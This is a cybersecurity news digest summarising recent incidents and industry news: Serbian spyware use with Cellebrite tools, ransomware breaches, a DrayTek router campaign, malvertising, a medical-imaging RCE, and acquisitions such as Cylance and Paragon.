Android Zero-Day Exploited in Spyware Campaigns, Amnesty International Points to Cellebrite
Amnesty International has uncovered a disturbing spyware campaign in Serbia targeting journalists and activists, exploiting an Android zero-day vulnerability. Linked to Cellebrite—an Israeli forensics vendor—and Serbian security agencies, the spyware, dubbed NoviSpy, bypassed encryption safeguards using Cellebrite's tools. One case detailed a journalist’s phone being infected during a traffic stop, while another activist’s device experienced suspicious battery drains following unusual missed calls, signaling potential zero-click attacks exploiting VoLTE or Wi-Fi calling features.
Amnesty warns this incident highlights a glaring oversight in Serbian regulations surrounding forensic tools. Cellebrite claims to enforce strict misuse policies, but Amnesty argues the attack underscores critical human rights concerns, particularly when highly invasive spyware and forensic tools are deployed in tandem. The Qualcomm-based exploit was patched in October, but millions of Android users were impacted. Read Amnesty’s full findings here.
Arctic Wolf Buys Cylance From BlackBerry for $160M Plus Stock, After $1.4B Acquisition in 2018
Endpoint security firm Arctic Wolf announced its acquisition of Cylance from BlackBerry for $160 million and stock equity, a steep drop from the $1.4 billion BlackBerry paid in 2018. The deal, expected to close by Q4, bolsters Arctic Wolf’s open-XDR platform with Cylance’s AI-driven endpoint protection capabilities. “We aim to eliminate alert fatigue and reduce risk exposure,” said CEO Nick Schneider, touting a unified, end-to-end security solution. BlackBerry, meanwhile, maintains its focus on Secure Communications products, leaving behind the underperforming Cylance division. Read more.
Citrix Warns of Password Spraying Attacks Targeting NetScaler Appliances
Citrix issued a critical advisory regarding large-scale password spraying attacks targeting NetScaler and NetScaler Gateway appliances, echoing earlier brute-force campaigns on Cisco and Fortinet devices. Unlike traditional brute-force attacks, password spraying uses a small set of passwords across multiple accounts, overwhelming systems and leading to service disruptions. Citrix recommends immediate mitigation steps: enabling multi-factor authentication (MFA), blocking rogue IPs, and implementing log rotation to prevent operational crashes. Organizations observing spikes in failed authentication attempts should review Citrix’s IoC indicators.
Undocumented DrayTek Vulnerabilities Exploited to Hack Hundreds of Orgs
Ransomware groups have exploited undocumented vulnerabilities, including a suspected zero-day flaw, in DrayTek routers to compromise 337 organizations. Security vendor Forescout and threat intel provider Prodaft tracked a campaign led by Monstrous Mantis, an initial access broker that shared stolen credentials with other threat actors like Ruthless Mantis and LARVA-15. Exploited systems were used to deploy ransomware, particularly Nokoyawa and Qilin, targeting businesses in Europe and Australia. Affected users should update to the latest firmware immediately. Full report here.
LKQ Hit by Cyberattack, Disrupting Canadian Operations
Auto parts giant LKQ Corporation disclosed a cyberattack impacting its Canadian business unit, causing weeks-long disruptions. LKQ, with operations in 1,600 locations worldwide, confirmed containment of the breach and reassured investors that the financial fallout remains minimal. The company is pursuing recovery costs through cybersecurity insurance. Details on the attacker or ransomware involvement remain unclear. More information.
SRP Federal Credit Union Ransomware Attack Exposes 240,000 Individuals
SRP Federal Credit Union is notifying over 240,000 affected customers of a ransomware attack between September and November 2024. Stolen data includes names, Social Security numbers, driver’s licenses, and financial information. The Nitrogen ransomware group, a newcomer in the cyber extortion scene, claims responsibility, allegedly exfiltrating 650GB of sensitive data. SRP is offering one year of free credit monitoring while warning customers to stay vigilant for identity theft. Details here.
Cl0p Claims Responsibility for Cleo Exploitation as New CVE Emerges
The notorious Cl0p ransomware group has taken credit for recent attacks on vulnerabilities in Cleo’s Harmony, VLTrader, and LexiCom tools, marking a continuation of its file transfer exploitation tactics. Security researchers discovered a new flaw, CVE-2024-55956, which facilitates unauthenticated file writes. Cleo urges immediate updates to version 5.8.0.24. Cl0p’s involvement evokes memories of its MOVEit breach, raising alarms over recurring zero-day exploitation in enterprise tools. Patch details.
Keepit Raises $50 Million for SaaS Data Protection Solution
Danish data protection provider Keepit secured a $50 million funding round led by One Peak and EIFO to accelerate product innovation and market expansion. Keepit’s SaaS platform simplifies enterprise data backup for tools like Microsoft 365, Salesforce, and Google Workspace. The funds will support broader coverage, improved data management features, and growth in Europe and the U.S. EIFO praised Keepit’s vendor-agnostic approach to cloud-native data protection. Learn more.
ConnectOnCall Breach Exposes 900,000 Patients’ Medical Data
ConnectOnCall, a patient communication tool, reported a data breach impacting 914,138 individuals, compromising medical records, dates of birth, and Social Security numbers. An attacker accessed its systems undetected between February and May 2024. The platform, widely used for after-hours healthcare coordination, has taken services offline pending security enhancements. Affected individuals are receiving free identity protection services. Full statement.
DeceptionAds Delivers 1M+ Daily Impressions Through 3,000 Sites
Researchers at Guardio Labs uncovered a sophisticated malvertising campaign, dubbed DeceptionAds, funneling traffic through over 3,000 compromised content sites. The campaign uses fake CAPTCHA pages to lure victims into executing malicious Base64-encoded PowerShell scripts, deploying information stealers like Lumma. Linked to the Monetag ad network, the attackers deliver over 1 million daily impressions, exposing thousands to credential theft. Following disclosure, Monetag suspended 200 malicious accounts. Read the research.
Nomani Scam Targets Global Investors with AI and Deepfake Ads
A new AI-powered investment scam, dubbed Nomani, has surged by 335% this year, using social media ads, fake endorsements, and AI-generated videos of celebrities to lure victims. Tracked by ESET, Nomani campaigns impersonate trusted brands and news outlets to phish personal data, later exploiting victims through fraudulent investments. Notably, the operation shows Russian-language indicators. Victims are manipulated into loans and financial losses through convincing post-scam phone calls. ESET advises users to verify ads and avoid unsolicited links. Full report.
Tic TAC Alert: RCE Vulnerability in Medical Imaging Software Patched
A critical Remote Code Execution (RCE) flaw, CVE-2024-42845, was discovered in widely used biomedical imaging tools processing DICOM files. Exploited via Python’s eval() function, attackers can execute arbitrary code by manipulating DICOM metadata. While patched in the latest release, the vulnerability underscores ongoing risks in healthcare IT. Hospitals and clinics using DICOM tools are urged to update systems immediately. Technical breakdown.
Hackers Attacking YouTube Creators with Weaponized Collaboration Requests
YouTube creators are now prime targets of a sophisticated phishing campaign where hackers impersonate brands to distribute malware. According to reports, the attackers send professionally branded collaboration emails offering sponsorships or promotional deals. Within these emails, malicious links or password-protected files are disguised as legitimate contracts or promotional content.
Once opened, the files deploy advanced malware like Lumma Stealer (source), capable of exfiltrating login credentials, financial information, and intellectual property. The malware uses obfuscation techniques to evade antivirus detection, manipulates clipboard data to target cryptocurrency wallets, and establishes persistent remote access.
Experts warn creators to verify unsolicited collaboration requests, avoid suspicious links, and activate multi-factor authentication (MFA). The attack highlights the evolving sophistication of phishing campaigns targeting the influencer ecosystem. (Read More)
Federal Money Fuels State Cybersecurity, But Its Future is Uncertain
The U.S. federal cybersecurity grant program for state and local governments, created in 2021, has been a "game-changer" for underfunded municipalities fighting cyber threats. With $1 billion allocated, funds have supported projects like endpoint detection software, risk assessments, and employee cybersecurity training. However, this vital program is set to expire in 2025, raising concerns about its future.
State leaders, including Connecticut’s emergency management director William Turner, emphasize the grant’s importance for small communities. Without renewal, cash-strapped local governments may face halted upgrades, unpatched vulnerabilities, and increased cyber risks. While federal agencies like FEMA push for continued funding, political headwinds under a GOP-led Congress may put the program’s survival at risk. (Full Story)
Rhode Island Cyberattack Disrupts Benefits System, Personal Data Compromised
Rhode Island’s critical RIBridges benefits system, managed by consulting firm Deloitte, was targeted in a major extortion cyberattack. Governor Dan McKee confirmed sensitive data—including Social Security numbers and banking information—may have been leaked. The state shut down the system following the discovery of malicious files that posed a threat to public services like SNAP and Medicaid.
Authorities are advising affected residents to adopt credit monitoring, implement freezes, and enable two-factor authentication to prevent financial fraud. Deloitte, under scrutiny for leading negotiations with the hackers, faces questions about its role and liability. (Read More)
Namibia’s Telecom Provider Refuses Ransom, Hackers Leak Data
Hunters International ransomware group has published data stolen from Telecom Namibia after the company refused to pay an exorbitant ransom. The attack exposed personal and financial information belonging to customers and high-ranking officials. Telecom Namibia CEO Stanley Shanapinda emphasized their zero-tolerance policy for negotiating with cybercriminals.
The leaked data highlights gaps in Namibia’s cybersecurity laws, as the country’s Data Protection Act remains unenforced. Authorities, including President Nangolo Mbumba, are treating the incident as a matter of national security. (Full Report)
American Private Equity Firm Acquires Israeli Spyware Company Paragon
AE Industrial Partners, a U.S. private equity firm, has acquired Israeli spyware company Paragon for a reported $450-500 million, with the deal potentially rising to $900 million. Paragon, known for its Graphite spyware, can extract data from encrypted platforms like Signal and WhatsApp. Unlike its controversial peer NSO Group, Paragon has successfully navigated U.S. markets, securing contracts with ICE and the DEA.
While Paragon remains under scrutiny for its ethical use, the acquisition underscores continued demand for surveillance technologies in law enforcement. (Learn More)
Russia Bans Viber, Accusing App of Facilitating Illegal Activities
Russia’s internet regulator Roskomnadzor has banned Viber, alleging the messaging app supports terrorism, drug trafficking, and illegal content distribution. The move follows ongoing crackdowns on foreign tech platforms, including Google, YouTube, and Signal.
With over 17 million Russian users, Viber’s ban adds to concerns about growing internet isolation under Moscow’s Runet project. Experts speculate that other messaging apps, including WhatsApp and Telegram, could face similar restrictions as Russia intensifies digital censorship. (Read the Full Report)
Serbian Authorities Used Cellebrite to Covertly Install Spyware on Phones
Serbian authorities have combined Cellebrite’s phone-unlocking software with newly discovered spyware, dubbed NoviSpy, to surveil journalists and activists, Amnesty International reports. Victims reported their phones were tampered with during police detentions, enabling unauthorized spyware installation.
NoviSpy, produced in Serbia, grants remote access to phone data, cameras, and microphones. Amnesty researchers linked the spyware’s command servers to Serbian security forces, raising concerns about systemic surveillance abuse. Cellebrite’s involvement also draws scrutiny, with the company pledging to investigate misuse claims. (More Details)
Dell and Microsoft Partner to Boost AI and Cybersecurity Innovations
Dell Technologies is collaborating with Microsoft to enhance AI adoption and bolster cybersecurity in multicloud environments. Their newly announced Dell APEX File Storage for Azure offers managed cloud storage, simplifying AI workload deployment. Additional services include implementation support for Azure AI and security tools like AI-powered cyber recovery systems.
The partnership aims to streamline AI integration across Microsoft platforms like Copilot Studio and Azure AI Services, while strengthening zero-trust security protocols. Dell’s offerings focus on improving operational efficiency, enabling real-time data processing, and enhancing resilience against cyber threats. (Read More)
What Keeps Cybersecurity Experts Awake at Night? Unpatched Systems and Poor Security Habits
Regional cybersecurity leaders cite outdated systems, unpatched vulnerabilities, and insecure communication channels like WhatsApp as critical concerns. Experts warn that exploits like EternalBlue still pose risks to legacy systems, while poor network segmentation allows attackers to escalate breaches laterally.
The panel, including researchers and white-hat testers, emphasized the importance of layered defenses, encrypted communications, and stronger awareness of social engineering tactics like deepfake voice calls. As threat actors blend into legitimate network traffic, proactive monitoring and response remain critical. (Full Discussion)
FDA Cyber Chief Addresses Compliance Challenges for Medical Devices
The FDA’s new cybersecurity rules for medical devices, in effect since March 2023, are driving improvements across the sector. Device manufacturers now face stricter requirements, including the submission of Software Bills of Materials (SBOM) and robust risk management plans.
However, compliance challenges remain, with inconsistent SBOM data formats and legacy devices being major hurdles. Nastassia Tamari, director of medical device cybersecurity, highlights the importance of ensuring devices are patchable to mitigate long-term risks. The FDA is actively refining its processes to automate SBOM reviews and enhance regulatory clarity. (Full Interview)